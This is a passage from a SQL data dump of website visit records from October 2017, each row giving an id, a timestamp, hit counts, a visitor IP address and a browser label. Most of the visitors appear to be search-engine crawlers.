77,1507647352,1,1,0,0,'66.249.70.25','chrome'),(164978,1507647768,1,1,0,0,'157.55.39.236','other'),(164979,1507648739,1,1,0,0,'178.251.107.198','chrome'),(164980,1507648886,1,1,0,0,'136.243.68.226','other'),(164981,1507649013,2,2,0,0,'141.8.142.74','other'),(164982,1507653496,1,1,0,0,'92.112.248.42','chrome'),(164983,1507654078,1,1,0,0,'91.196.178.165','chrome'),(164984,1507654508,1,1,0,0,'91.196.178.67','firefox'),(164985,1507654598,1,1,0,0,'91.124.181.236','chrome'),(164986,1507655487,1,1,0,0,'180.76.15.20','other'),(164987,1507655695,1,1,0,0,'217.69.133.203','other'),(164988,1507656073,1,1,0,0,'8.29.198.27','other'),(164989,1507656973,1,1,0,0,'87.250.224.151','other'),(164990,1507657634,1,1,0,0,'178.154.171.88','other'),(164991,1507659642,1,1,0,0,'163.172.68.238','other'),(164992,1507660637,1,1,0,0,'217.69.133.9','other'),(164993,1507662217,1,1,0,0,'207.46.13.150','other'),(164994,1507663750,1,1,0,0,'81.1.242.33','other'),(164995,1507664500,1,0,1,0,'66.249.70.25',''),(164996,1507666224,1,1,0,0,'217.69.133.3','other'),(164997,1507666371,1,1,0,0,'66.249.64.30','chrome'),(164998,1507666397,1,1,0,0,'66.249.70.27','chrome'),(164999,1507666479,1,1,0,0,'84.155.246.243','chrome'),(165000,1507666910,1,1,0,0,'8.29.198.27','other'),(165001,1507667824,1,1,0,0,'185.29.11.46','msie'),(165002,1507668387,1,1,0,0,'37.9.113.182','other'),(165003,1507668655,2,0,2,0,'66.249.64.30',''),(165004,1507669124,1,1,0,0,'54.165.59.7','other'),(165005,1507671954,1,1,0,0,'207.46.13.150','other'),(165006,1507673299,1,1,0,0,'178.154.171.88','other'),(165007,1507673956,1,1,0,0,'213.180.203.40','other'),(165008,1507674765,2,2,0,0,'141.8.142.74','other'),(165009,1507677327,1,1,0,0,'207.46.13.150','other'),(165010,1507677748,1,1,0,0,'8.29.198.26','other'),(165011,1507680186,1,1,0,0,'207.46.13.150','other'),(165012,1507680410,1,1,0,0,'157.55.39.37','other'),(165013,1507682270,1,0,1,0,'66.249.64.28',''),(165014,1507682640,1,1,0,0,'216.244.66.237','other'),(165015,1507682903,1,1,0,0,'217.69.133.3','other'),(165016,1507684914,1,0,1,0,'66.249.70.25',''),(165017,1507685433,1,1,0,0,'141.8.142.74','other'),(165018,1507686115,1,0,1,0,'66.249.70.29',''),(165019,1507687498,1,0,1,0,'66.249.64.29',''),(165020,1507687912,1,0,1,0,'66.249.64.28',''),(165021,1507688027,1,1,0,0,'157.55.39.207','other'),(165022,1507688038,1,1,0,0,'157.55.39.37','other'),(165023,1507688587,1,1,0,0,'8.29.198.27','other'),(165024,1507689180,1,1,0,0,'180.76.15.13','other'),(165025,1507690930,1,0,1,0,'66.249.64.30',''),(165026,1507691709,1,1,0,0,'46.48.13.161','chrome'),(165027,1507692567,1,1,0,0,'141.8.142.74','other'),(165028,1507694905,1,1,0,0,'217.69.133.194','other'),(165029,1507695598,1,1,0,0,'141.8.142.74','other'),(165030,1507696568,1,1,0,0,'123.126.113.153','firefox'),(165031,1507698475,1,1,0,0,'91.196.178.65','firefox'),(165032,1507698515,1,1,0,0,'5.45.207.82','other'),(165033,1507699422,1,1,0,0,'8.29.198.25','other'),(165034,1507699761,1,1,0,0,'217.69.133.5','other'),(165035,1507699773,1,1,0,0,'217.69.133.2','other'),(165036,1507699785,1,1,0,0,'217.69.133.9','other'),(165037,1507700440,1,1,0,0,'66.102.9.25','chrome'),(165038,1507700702,1,1,0,0,'91.196.178.69','chrome'),(165039,1507701022,1,1,0,0,'213.108.45.138','chrome'),(165040,1507701057,1,1,0,0,'91.196.178.161','chrome'),(165041,1507702507,3,3,0,0,'91.196.178.72','chrome'),(165042,1507702929,1,1,0,0,'91.196.178.67','chrome'),(165043,1507703420,1,1,0,0,'66.249.64.30','chrome'),(165044,1507703423,1,1,0,0,'91.196.178.72','chrome'),(165045,1507703880,1,1,0,0,'180.76.15.19','other'),(165046,1507704433,1,1,0,0,'141.8.142.74','other'),(165047,1507704726,1,1,0,0,'91.196.178.67','chrome'),(165048,1507705277,1,1,0,0,'40.77.167.125','other'),(165049,1507705366,1,1,0,0,'217.69.133.3','other'),(165050,1507705387,1,1,0,0,'217.69.133.203','other'),(165051,1507706357,1,1,0,0,'178.154.171.81','other'),(165052,1507706932,1,1,0,0,'40.77.167.125','other'),(165053,1507706990,1,1,0,0,'157.55.39.143','other'),(165054,1507707521,1,1,0,0,'91.196.178.135','chrome'),(165055,1507708449,1,1,0,0,'91.196.178.133','firefox'),(165056,1507708661,1,1,0,0,'91.196.178.65','chrome'),(165057,1507708852,1,1,0,0,'141.8.142.74','other'),(165058,1507710096,1,1,0,0,'207.46.13.46','other'),(165059,1507710250,1,1,0,0,'8.29.198.27','other'),(165060,1507710503,1,1,0,0,'37.9.113.115','other'),(165061,1507711510,1,1,0,0,'91.196.179.25','chrome'),(165062,1507711792,1,1,0,0,'217.69.133.194','other'),(165063,1507713116,1,1,0,0,'207.46.13.46','other'),(165064,1507713156,1,1,0,0,'178.154.171.88','other'),(165065,1507713519,1,1,0,0,'180.76.15.17','other'),(165066,1507713640,2,2,0,0,'5.9.155.37','other'),(165067,1507713852,1,0,1,0,'66.249.64.29',''),(165068,1507714343,1,0,1,0,'66.249.64.30',''),(165069,1507714370,3,3,0,0,'141.8.142.74','other'),(165070,1507714723,1,1,0,0,'107.178.194.28','msie'),(165071,1507714726,1,1,0,0,'204.13.201.139','msie'),(165072,1507714905,1,1,0,0,'52.27.2.86','msie'),(165073,1507715035,1,1,0,0,'45.55.224.77','msie'),(165074,1507715650,1,1,0,0,'194.44.142.6','chrome'),(165075,1507716598,1,1,0,0,'217.69.133.4','other'),(165076,1507717305,1,0,1,0,'66.249.64.30',''),(165077,1507717363,1,1,0,0,'217.69.133.2','other'),(165078,1507717371,1,1,0,0,'217.69.133.6','other'),(165079,1507718101,1,1,0,0,'141.8.142.74','other'),(165080,1507718297,1,1,0,0,'91.196.178.67','firefox'),(165081,1507718571,1,1,0,0,'87.250.224.46','other'),(165082,1507718883,1,1,0,0,'176.111.72.239','msie'),(165083,1507719177,1,1,0,0,'46.200.113.13','firefox'),(165084,1507719337,2,2,0,0,'141.8.142.74','other'),(165085,1507719965,2,2,0,0,'178.154.171.88','other'),(165086,1507720308,1,1,0,0,'207.46.13.181','other'),(165087,1507720373,1,1,0,0,'165.227.73.78','other'),(165088,1507721050,1,1,0,0,'217.69.133.4','other'),(165089,1507721092,1,1,0,0,'8.29.198.27','other'),(165090,1507721523,3,3,0,0,'141.8.142.74','other'),(165091,1507721598,1,1,0,0,'37.52.175.221','opera'),(165092,1507722239,1,1,0,0,'162.210.196.130','other'),(165093,1507722254,1,1,0,0,'217.69.133.194','other'),(165094,1507722497,1,1,0,0,'91.196.177.15','chrome'),(165095,1507722734,1,1,0,0,'37.54.29.162','chrome'),(165096,1507722981,1,1,0,0,'217.69.133.4','other'),(165097,1507724144,1,1,0,0,'91.196.178.161','chrome'),(165098,1507724822,1,1,0,0,'91.196.178.67','chrome'),(165099,1507725446,1,1,0,0,'178.154.171.88','other'),(165100,1507725497,1,1,0,0,'91.196.178.161','chrome'),(165101,1507725712,1,0,1,0,'66.249.64.30',''),(165102,1507726075,1,1,0,0,'141.8.142.74','other'),(165103,1507727568,1,1,0,0,'46.200.113.13','firefox'),(165104,1507727626,1,1,0,0,'37.52.175.221','opera'),(165105,1507727690,1,0,1,0,'66.249.64.29',''),(165106,1507727845,1,1,0,0,'217.69.133.5','other'),(165107,1507728134,1,1,0,0,'46.200.87.241','chrome'),(165108,1507728613,1,1,0,0,'91.196.178.68','firefox'),(165109,1507728894,1,1,0,0,'95.134.185.99','chrome'),(165110,1507728911,1,1,0,0,'40.77.167.125','other'),(165111,1507729429,1,1,0,0,'141.8.142.74','other'),(165112,1507729929,1,0,1,0,'66.249.64.30',''),(165113,1507730353,1,1,0,0,'91.196.178.67','chrome'),(165114,1507730426,1,1,0,0,'54.165.59.7','other'),(165115,1507731010,1,1,0,0,'91.196.178.161','chrome'),(165116,1507731052,1,1,0,0,'91.236.184.132','firefox'),(165117,1507731923,1,1,0,0,'8.29.198.26','other'),(165118,1507732305,1,1,0,0,'217.69.133.2','other'),(165119,1507732401,1,1,0,0,'5.45.207.82','other'),(165120,1507733548,1,1,0,0,'5.166.142.179','msie'),(165121,1507734420,1,1,0,0,'207.46.13.181','other'),(165122,1507734521,1,1,0,0,'217.69.133.67','other'),(165123,1507735686,1,1,0,0,'37.9.113.115','other'),(165124,1507736168,1,1,0,0,'91.196.177.46','firefox'),(165125,1507736609,1,1,0,0,'95.132.40.147','firefox'),(165126,1507737175,1,1,0,0,'207.46.13.46','other'),(165127,1507737769,1,1,0,0,'217.69.143.217','firefox'),(165128,1507738175,2,0,2,0,'66.249.64.30',''),(165129,1507738877,1,1,0,0,'95.132.12.62','other'),(165130,1507739479,2,2,0,0,'91.196.177.142','chrome'),(165131,1507739984,1,0,1,0,'66.249.70.29',''),(165132,1507740045,1,1,0,0,'66.249.64.29','chrome'),(165133,1507740108,1,1,0,0,'66.249.70.27','chrome'),(165134,1507742472,1,1,0,0,'178.154.171.60','other'),(165135,1507742755,1,1,0,0,'8.29.198.25','other'),(165136,1507744462,1,1,0,0,'51.255.173.53','other'),(165137,1507745810,1,1,0,0,'46.211.145.7','chrome'),(165138,1507745854,1,0,1,0,'66.249.64.30',''),(165139,1507746953,1,1,0,0,'107.167.116.246','chrome'),(165140,1507747041,1,1,0,0,'37.73.197.80','chrome'),(165141,1507747254,1,1,0,0,'91.196.178.33','chrome'),(165142,1507747407,1,1,0,0,'157.55.39.143','other'),(165143,1507749419,1,1,0,0,'91.196.178.33','chrome'),(165144,1507749447,4,4,0,0,'54.165.59.7','other'),(165145,1507750497,1,1,0,0,'193.70.39.204','other'),(165146,1507750675,3,3,0,0,'54.165.59.7','other'),(165147,1507750908,1,1,0,0,'91.196.178.68','chrome'),(165148,1507751035,1,1,0,0,'157.55.39.143','other'),(165149,1507751934,2,2,0,0,'54.165.59.7','other'),(165150,1507753590,1,1,0,0,'8.29.198.25','other'),(165151,1507754064,1,1,0,0,'54.165.59.7','other'),(165152,1507756874,2,2,0,0,'195.154.146.17','other'),(165153,1507757964,1,1,0,0,'216.244.66.237','other'),(165154,1507758503,1,1,0,0,'5.45.207.49','other'),(165155,1507759503,1,1,0,0,'217.69.133.215','other'),(165156,1507759699,1,0,1,0,'68.180.229.52',''),(165157,1507760070,1,1,0,0,'109.63.173.53','msie'),(165158,1507760516,1,1,0,0,'54.165.59.7','other'),(165159,1507763268,1,1,0,0,'37.52.17.97','chrome'),(165160,1507764210,1,1,0,0,'178.154.171.88','other'),(165161,1507764426,1,1,0,0,'8.29.198.25','other'),(165162,1507764540,1,1,0,0,'87.250.224.46','other'),(165163,1507766767,1,1,0,0,'54.208.102.37','other'),(165164,1507769832,16,16,0,0,'46.48.13.161','chrome'),(165165,1507770678,1,0,1,0,'66.249.64.30',''),(165166,1507770986,1,0,1,0,'66.249.64.29',''),(165167,1507771509,1,1,0,0,'207.46.13.181','other'),(165168,1507772302,1,1,0,0,'207.46.13.46','other'),(165169,1507772624,1,1,0,0,'180.76.15.10','other'),(165170,1507772883,1,1,0,0,'157.55.39.111','other'),(165171,1507773071,1,0,1,0,'66.249.64.30',''),(165172,1507773647,1,1,0,0,'185.8.107.162','chrome'),(165173,1507773662,1,1,0,0,'216.244.66.237','other'),(165174,1507774964,1,1,0,0,'66.249.64.29','chrome'),(165175,1507775267,1,1,0,0,'8.29.198.27','other'),(165176,1507776121,1,1,0,0,'180.76.15.11','other'),(165177,1507778074,1,1,0,0,'157.55.39.111','other'),(165178,1507778270,1,1,0,0,'207.46.13.181','other'),(165179,1507778476,1,1,0,0,'37.9.113.138','other'),(165180,1507778847,1,1,0,0,'141.8.142.74','other'),(165181,1507782644,1,1,0,0,'178.154.171.88','other'),(165182,1507783069,1,1,0,0,'91.196.177.46','firefox'),(165183,1507784200,1,1,0,0,'91.196.178.103','chrome'),(165184,1507784797,1,1,0,0,'157.55.39.111','other'),(165185,1507784830,1,1,0,0,'37.9.113.132','other'),(165186,1507785947,1,1,0,0,'213.180.203.40','other'),(165187,1507786094,1,1,0,0,'91.196.178.67','chrome'),(165188,1507786101,1,1,0,0,'8.29.198.25','other'),(165189,1507786270,1,1,0,0,'216.244.66.237','other'),(165190,1507787456,1,1,0,0,'66.102.9.29','chrome'),(165191,1507787518,1,0,1,0,'66.249.64.157',''),(165192,1507788015,1,1,0,0,'178.154.171.60','other'),(165193,1507788131,1,1,0,0,'5.45.207.49','other'),(165194,1507788651,1,1,0,0,'13.59.148.203','other'),(165195,1507789121,1,1,0,0,'91.196.178.67','chrome'),(165196,1507789355,1,1,0,0,'188.163.16.6','chrome'),(165197,1507789862,1,1,0,0,'91.196.178.133','firefox'),(165198,1507790065,1,1,0,0,'195.68.203.239','chrome'),(165199,1507790433,3,3,0,0,'216.244.66.237','other'),(165200,1507790808,1,1,0,0,'91.196.178.129','chrome'),(165201,1507790855,1,1,0,0,'91.208.145.231','chrome'),(165202,1507791534,32,32,0,0,'88.198.0.163','other'),(165203,1507791579,1,1,0,0,'193.107.72.66','chrome'),(165204,1507793324,1,0,1,0,'68.180.230.153',''),(165205,1507794014,2,2,0,0,'178.154.171.88','other'),(165206,1507794071,1,1,0,0,'217.69.133.4','other'),(165207,1507794164,1,0,1,0,'66.249.64.157',''),(165208,1507794168,1,1,0,0,'66.249.64.153','chrome'),(165209,1507794174,1,1,0,0,'66.249.64.30','chrome'),(165210,1507794300,2,0,2,0,'66.249.64.29',''),(165211,1507794329,1,0,1,0,'66.249.64.28',''),(165212,1507794554,1,1,0,0,'141.8.142.74','other'),(165213,1507796711,1,0,1,0,'66.249.64.29',''),(165214,1507796932,1,1,0,0,'8.29.198.27','other'),(165215,1507797074,1,1,0,0,'141.8.142.74','other'),(165216,1507798416,1,1,0,0,'217.69.133.203','other'),(165217,1507798709,1,1,0,0,'178.154.171.88','other'),(165218,1507799597,1,1,0,0,'91.196.177.15','chrome'),(165219,1507799835,1,1,0,0,'178.154.171.88','other'),(165220,1507800391,2,2,0,0,'87.250.224.46','other'),(165221,1507800556,1,1,0,0,'37.9.113.182','other'),(165222,1507801559,1,1,0,0,'93.75.50.63','chrome'),(165223,1507802036,1,0,1,0,'66.249.64.28',''),(165224,1507802158,1,0,1,0,'66.249.64.29',''),(165225,1507802216,1,1,0,0,'37.52.22.117','chrome'),(165226,1507802227,1,1,0,0,'141.8.142.74','other'),(165227,1507802446,1,1,0,0,'141.8.132.19','other'),(165228,1507802467,1,1,0,0,'37.9.113.182','other'),(165229,1507802479,1,1,0,0,'93.75.50.63','chrome'),(165230,1507802800,2,2,0,0,'178.154.171.88','other'),(165231,1507803000,1,1,0,0,'162.210.196.98','other'),(165232,1507804332,1,0,1,0,'66.249.64.29',''),(165233,1507804646,1,1,0,0,'109.63.157.29','msie'),(165234,1507804687,1,1,0,0,'178.154.171.88','other'),(165235,1507804793,3,3,0,0,'69.30.234.2','other'),(165236,1507805479,1,1,0,0,'95.134.203.30','firefox'),(165237,1507806011,1,0,1,0,'68.180.229.52',''),(165238,1507806372,1,1,0,0,'178.154.200.32','other'),(165239,1507806490,1,1,0,0,'5.45.207.83','other'),(165240,1507806514,1,1,0,0,'216.244.66.237','other'),(165241,1507806878,1,1,0,0,'37.9.113.115','other'),(165242,1507806912,1,1,0,0,'87.250.224.46','other'),(165243,1507807544,1,1,0,0,'213.180.203.40','other'),(165244,1507807759,1,1,0,0,'8.29.198.26','other'),(165245,1507807805,1,1,0,0,'91.196.177.46','chrome'),(165246,1507809730,1,1,0,0,'87.250.224.85','other'),(165247,1507809839,1,1,0,0,'46.48.13.161','chrome'),(165248,1507809962,1,1,0,0,'37.9.113.114','other'),(165249,1507809965,1,1,0,0,'5.45.207.58','other'),(165250,1507810641,1,1,0,0,'66.249.64.30','chrome'),(165251,1507810646,1,0,1,0,'66.249.64.153',''),(165252,1507810651,1,1,0,0,'66.249.64.155','chrome'),(165253,1507810864,2,2,0,0,'141.8.142.74','other'),(165254,1507811010,1,1,0,0,'157.55.39.111','other'),(165255,1507811571,1,0,1,0,'66.249.64.29',''),(165256,1507811735,1,1,0,0,'91.196.178.70','chrome'),(165257,1507812160,1,1,0,0,'141.8.142.74','other'),(165258,1507813452,1,0,1,0,'66.249.64.157',''),(165259,1507814408,1,1,0,0,'207.46.13.46','other'),(165260,1507814953,1,1,0,0,'91.196.178.69','chrome'),(165261,1507815278,1,1,0,0,'46.188.22.119','msie'),(165262,1507815279,1,1,0,0,'109.63.207.254','msie'),(165263,1507815407,1,1,0,0,'207.46.13.46','other'),(165264,1507815509,4,4,0,0,'87.250.224.46','other'),(165265,1507815732,3,3,0,0,'141.8.142.74','other'),(165266,1507815874,2,2,0,0,'178.154.171.88','other'),(165267,1507815971,1,1,0,0,'66.249.64.30','chrome'),(165268,1507815975,1,0,1,0,'66.249.64.155',''),(165269,1507815979,1,1,0,0,'66.249.64.155','chrome'),(165270,1507816629,1,1,0,0,'87.250.224.46','other'),(165271,1507817083,2,2,0,0,'157.55.39.143','other'),(165272,1507817547,1,1,0,0,'185.154.52.98','chrome'),(165273,1507818599,1,1,0,0,'8.29.198.26','other'),(165274,1507819357,1,1,0,0,'157.55.39.143','other'),(165275,1507820011,1,1,0,0,'66.249.64.28','chrome'),(165276,1507820657,1,1,0,0,'178.154.171.88','other'),(165277,1507821189,1,1,0,0,'207.46.13.97','other'),(165278,1507821387,1,1,0,0,'66.249.64.153','chrome'),(165279,1507821633,1,1,0,0,'213.180.203.8','other'),(165280,1507821637,1,1,0,0,'178.154.171.4','other'),(165281,1507821925,1,1,0,0,'188.166.25.25','chrome'),(165282,1507822135,2,2,0,0,'178.154.171.88','other'),(165283,1507822699,1,1,0,0,'81.1.242.33','other'),(165284,1507823033,1,1,0,0,'66.249.64.30','chrome'),(165285,1507823158,1,0,1,0,'66.249.64.29',''),(165286,1507823663,3,3,0,0,'178.154.171.88','other'),(165287,1507823974,3,3,0,0,'81.1.242.33','other'),(165288,1507824383,1,1,0,0,'207.46.13.46','other'),(165289,1507824479,1,1,0,0,'74.115.214.147','other'),(165290,1507825042,1,1,0,0,'66.249.64.157','chrome'),(165291,1507825584,1,0,1,0,'66.249.64.153',''),(165292,1507825738,1,1,0,0,'141.8.142.74','other'),(165293,1507825820,1,0,1,0,'66.249.64.155',''),(165294,1507826547,5,5,0,0,'46.229.168.67','other'),(165295,1507826558,1,1,0,0,'128.69.152.12','chrome'),(165296,1507826567,3,3,0,0,'46.229.168.72','other'),(165297,1507826583,3,3,0,0,'46.229.168.65','other'),(165298,1507826602,6,6,0,0,'46.229.168.68','other'),(165299,1507826621,7,7,0,0,'46.229.168.80','other'),(165300,1507826648,3,3,0,0,'46.229.168.78','other'),(165301,1507826698,7,7,0,0,'46.229.168.75','other'),(165302,1507826718,1,1,0,0,'46.229.168.73','other'),(165303,1507826794,6,6,0,0,'46.229.168.74','other'),(165304,1507826811,3,3,0,0,'46.229.168.76','other'),(165305,1507826830,4,4,0,0,'46.229.168.69','other'),(165306,1507826952,1,1,0,0,'141.8.142.74','other'),(165307,1507826984,4,4,0,0,'46.229.168.71','other'),(165308,1507827007,3,3,0,0,'46.229.168.66','other'),(165309,1507827197,3,3,0,0,'46.229.168.79','other'),(165310,1507827248,7,7,0,0,'46.229.168.70','other'),(165311,1507827493,2,2,0,0,'46.229.168.72','other'),(165312,1507827509,2,2,0,0,'46.229.168.68','other'),(165313,1507827527,8,8,0,0,'46.229.168.67','other'),(165314,1507827557,1,0,1,0,'66.249.64.29',''),(165315,1507827565,5,5,0,0,'46.229.168.80','other'),(165316,1507827626,5,5,0,0,'46.229.168.65','other'),(165317,1507827741,4,4,0,0,'46.229.168.73','other'),(165318,1507827760,3,3,0,0,'46.229.168.76','other'),(165319,1507827897,4,4,0,0,'46.229.168.77','other'),(165320,1507827971,2,2,0,0,'46.229.168.74','other'),(165321,1507828013,5,5,0,0,'46.229.168.78','other'),(165322,1507828064,3,3,0,0,'46.229.168.71','other'),(165323,1507828104,5,5,0,0,'46.229.168.75','other'),(165324,1507828203,3,3,0,0,'46.229.168.69','other'),(165325,1507828263,1,1,0,0,'141.8.142.74','other'),(165326,1507828382,6,6,0,0,'46.229.168.70','other'),(165327,1507828391,3,3,0,0,'46.229.168.79','other'),(165328,1507828457,8,8,0,0,'46.229.168.66','other'),(165329,1507828487,6,6,0,0,'46.229.168.67','other'),(165330,1507828661,4,4,0,0,'46.229.168.80','other'),(165331,1507828701,4,4,0,0,'46.229.168.72','other'),(165332,1507828727,3,3,0,0,'46.229.168.76','other'),(165333,1507828792,8,8,0,0,'46.229.168.68','other'),(165334,1507828918,5,5,0,0,'46.229.168.78','other'),(165335,1507828958,3,3,0,0,'46.229.168.74','other'),(165336,1507828963,1,1,0,0,'209.90.225.219','chrome'),(165337,1507829031,3,3,0,0,'46.229.168.73','other'),(165338,1507829055,4,4,0,0,'46.229.168.75','other'),(165339,1507829118,1,1,0,0,'46.229.168.65','other'),(165340,1507829230,1,1,0,0,'141.8.142.74','other'),(165341,1507829236,4,4,0,0,'46.229.168.69','other'),(165342,1507829295,4,4,0,0,'46.229.168.71','other'),(165343,1507829311,6,6,0,0,'46.229.168.70','other'),(165344,1507829409,4,4,0,0,'46.229.168.77','other'),(165345,1507829435,1,1,0,0,'8.29.198.27','other'),(165346,1507829535,2,2,0,0,'46.229.168.66','other'),(165347,1507829560,1,1,0,0,'188.191.237.25','chrome'),(165348,1507829746,8,8,0,0,'46.229.168.79','other'),(165349,1507829778,5,5,0,0,'46.229.168.76','other'),(165350,1507829860,3,3,0,0,'46.229.168.80','other'),(165351,1507829880,5,5,0,0,'46.229.168.74','other'),(165352,1507829959,3,3,0,0,'46.229.168.68','other'),(165353,1507829989,7,7,0,0,'46.229.168.78','other'),(165354,1507829996,3,3,0,0,'46.229.168.73','other'),(165355,1507830014,8,8,0,0,'46.229.168.72','other'),(165356,1507830040,1,0,1,0,'66.249.64.157',''),(165357,1507830085,2,2,0,0,'46.229.168.75','other'),(165358,1507830105,1,1,0,0,'66.249.64.155','chrome'),(165359,1507830230,2,2,0,0,'46.229.168.65','other'),(165360,1507830352,8,8,0,0,'46.229.168.77','other'),(165361,1507830426,7,7,0,0,'46.229.168.69','other'),(165362,1507830479,5,5,0,0,'46.229.168.67','other'),(165363,1507830548,2,2,0,0,'46.229.168.66','other'),(165364,1507830693,3,3,0,0,'46.229.168.76','other'),(165365,1507830730,5,5,0,0,'46.229.168.79','other'),(165366,1507830774,1,1,0,0,'93.75.50.63','chrome'),(165367,1507830898,3,3,0,0,'46.229.168.78','other'),(165368,1507830997,3,3,0,0,'46.229.168.68','other'),(165369,1507831035,1,1,0,0,'46.229.168.70','other'),(165370,1507831057,5,5,0,0,'46.229.168.80','other'),(165371,1507831093,2,2,0,0,'46.229.168.71','other'),(165372,1507831112,1,1,0,0,'46.229.168.72','other'),(165373,1507831131,3,3,0,0,'46.229.168.73','other'),(165374,1507831168,1,1,0,0,'46.229.168.65','other'),(165375,1507831187,2,2,0,0,'46.229.168.75','other'),(165376,1507831342,3,3,0,0,'46.229.168.74','other'),(165377,1507831443,1,1,0,0,'46.229.168.69','other'),(165378,1507831462,1,1,0,0,'46.229.168.67','other'),(165379,1507831525,1,1,0,0,'216.244.66.237','other'),(165380,1507831683,1,1,0,0,'91.196.178.165','chrome'),(165381,1507832715,1,1,0,0,'141.8.142.74','other'),(165382,1507832733,1,1,0,0,'37.73.252.187','chrome'),(165383,1507832745,1,1,0,0,'217.69.133.194','other'),(165384,1507832864,1,1,0,0,'66.249.64.153','chrome'),(165385,1507833164,1,1,0,0,'188.191.237.25','chrome'),(165386,1507833504,1,0,1,0,'66.249.64.155',''),(165387,1507833862,1,1,0,0,'46.211.99.71','other'),(165388,1507833980,1,1,0,0,'66.249.64.30','chrome'),(165389,1507834261,2,2,0,0,'141.8.142.74','other'),(165390,1507835068,2,2,0,0,'46.229.168.74','other'),(165391,1507835104,1,1,0,0,'46.229.168.77','other'),(165392,1507835141,1,1,0,0,'46.229.168.78','other'),(165393,1507835171,1,1,0,0,'178.154.171.88','other'),(165394,1507835177,3,3,0,0,'46.229.168.65','other'),(165395,1507835214,2,2,0,0,'46.229.168.70','other'),(165396,1507835251,2,2,0,0,'46.229.168.67','other'),(165397,1507835289,6,6,0,0,'46.229.168.75','other'),(165398,1507835326,1,1,0,0,'46.229.168.66','other'),(165399,1507835441,2,2,0,0,'46.229.168.80','other'),(165400,1507835479,3,3,0,0,'46.229.168.79','other'),(165401,1507835519,3,3,0,0,'46.229.168.76','other'),(165402,1507835592,1,1,0,0,'199.58.164.124','other'),(165403,1507835617,1,1,0,0,'188.166.55.118','chrome'),(165404,1507835641,2,2,0,0,'46.229.168.73','other'),(165405,1507835724,2,2,0,0,'46.229.168.72','other'),(165406,1507836066,3,3,0,0,'46.229.168.68','other'),(165407,1507836110,2,2,0,0,'46.229.168.71','other'),(165408,1507836248,4,4,0,0,'46.229.168.75','other'),(165409,1507836258,1,0,1,0,'66.249.64.29',''),(165410,1507836341,2,2,0,0,'46.229.168.65','other'),(165411,1507836435,1,1,0,0,'46.229.168.76','other'),(165412,1507836483,3,3,0,0,'46.229.168.80','other'),(165413,1507836579,2,2,0,0,'46.229.168.73','other'),(165414,1507836634,2,2,0,0,'46.229.168.77','other'),(165415,1507836853,3,3,0,0,'46.229.168.72','other'),(165416,1507836986,2,2,0,0,'46.229.168.69','other'),(165417,1507837210,1,1,0,0,'46.229.168.70','other'),(165418,1507837255,2,2,0,0,'46.229.168.67','other'),(165419,1507837277,3,3,0,0,'141.8.142.74','other'),(165420,1507837299,4,4,0,0,'46.229.168.65','other'),(165421,1507837344,1,1,0,0,'46.229.168.71','other'),(165422,1507837477,2,2,0,0,'46.229.168.80','other'),(165423,1507837521,1,1,0,0,'46.229.168.76','other'),(165424,1507837565,3,3,0,0,'46.229.168.79','other'),(165425,1507837610,1,1,0,0,'46.229.168.68','other'),(165426,1507837654,2,2,0,0,'46.229.168.77','other'),(165427,1507837743,1,1,0,0,'46.229.168.66','other'),(165428,1507837967,2,2,0,0,'46.229.168.73','other'),(165429,1507838012,2,2,0,0,'46.229.168.69','other'),(165430,1507838057,2,2,0,0,'46.229.168.74','other'),(165431,1507838130,1,1,0,0,'178.154.171.88','other'),(165432,1507838242,4,4,0,0,'46.229.168.72','other'),(165433,1507838280,3,3,0,0,'46.229.168.65','other'),(165434,1507838328,1,1,0,0,'130.180.218.224','opera'),(165435,1507838355,1,1,0,0,'46.229.168.70','other'),(165436,1507838369,1,1,0,0,'46.229.168.67','other'),(165437,1507838460,2,2,0,0,'46.229.168.75','other'),(165438,1507838510,1,1,0,0,'51.255.65.20','other'),(165439,1507838566,2,2,0,0,'141.8.142.74','other'),(165440,1507838594,2,2,0,0,'46.229.168.77','other'),(165441,1507838650,1,1,0,0,'176.31.231.10','other'),(165442,1507838687,1,1,0,0,'46.229.168.79','other'),(165443,1507838855,3,3,0,0,'46.229.168.68','other'),(165444,1507838958,1,1,0,0,'217.182.132.187','other'),(165445,1507838960,1,1,0,0,'46.229.168.71','other'),(165446,1507839095,2,2,0,0,'46.229.168.74','other'),(165447,1507839144,2,2,0,0,'46.229.168.76','other'),(165448,1507839235,3,3,0,0,'46.229.168.69','other'),(165449,1507839316,2,2,0,0,'46.229.168.70','other'),(165450,1507839422,12,12,0,0,'144.76.6.230','other'),(165451,1507839433,1,1,0,0,'217.182.132.180','other'),(165452,1507839558,1,1,0,0,'46.229.168.73','other'),(165453,1507839587,1,1,0,0,'51.255.65.81','other'),(165454,1507839641,1,1,0,0,'217.182.132.82','other'),(165455,1507839649,2,2,0,0,'46.229.168.80','other'),(165456,1507839693,1,1,0,0,'46.229.168.67','other'),(165457,1507839717,1,0,1,0,'66.249.64.30',''),(165458,1507839742,3,3,0,0,'46.229.168.72','other'),(165459,1507839880,2,2,0,0,'46.229.168.79','other'),(165460,1507839925,1,1,0,0,'46.229.168.71','other'),(165461,1507839947,1,1,0,0,'87.250.224.46','other'),(165462,1507839972,1,1,0,0,'46.229.168.68','other'),(165463,1507840117,2,2,0,0,'46.229.168.77','other'),(165464,1507840171,23,23,0,0,'142.4.200.37','other'),(165465,1507840194,2,2,0,0,'46.229.168.75','other'),(165466,1507840241,3,3,0,0,'46.229.168.78','other'),(165467,1507840265,1,1,0,0,'8.29.198.25','other'),(165468,1507840395,1,1,0,0,'46.229.168.70','other'),(165469,1507840428,1,1,0,0,'66.249.64.28','chrome'),(165470,1507840440,1,1,0,0,'46.229.168.76','other'),(165471,1507840446,1,1,0,0,'217.182.132.157','other'),(165472,1507840544,1,1,0,0,'217.182.132.185','other'),(165473,1507840554,2,2,0,0,'46.229.168.74','other'),(165474,1507840601,1,1,0,0,'46.229.168.65','other'),(165475,1507840630,1,1,0,0,'217.182.132.64','other'),(165476,1507840668,1,0,1,0,'66.249.64.153',''),(165477,1507840705,1,1,0,0,'217.182.132.155','other'),(165478,1507840737,3,3,0,0,'46.229.168.66','other'),(165479,1507840775,1,1,0,0,'51.255.71.118','other'),(165480,1507840782,3,3,0,0,'46.229.168.69','other'),(165481,1507840827,1,1,0,0,'46.229.168.72','other'),(165482,1507840873,2,2,0,0,'46.229.168.68','other'),(165483,1507840918,1,1,0,0,'46.229.168.73','other'),(165484,1507840965,1,1,0,0,'46.229.168.71','other'),(165485,1507841013,1,1,0,0,'217.182.132.174','other'),(165486,1507841055,1,1,0,0,'46.229.168.79','other'),(165487,1507841097,1,1,0,0,'51.255.65.56','other'),(165488,1507841144,3,3,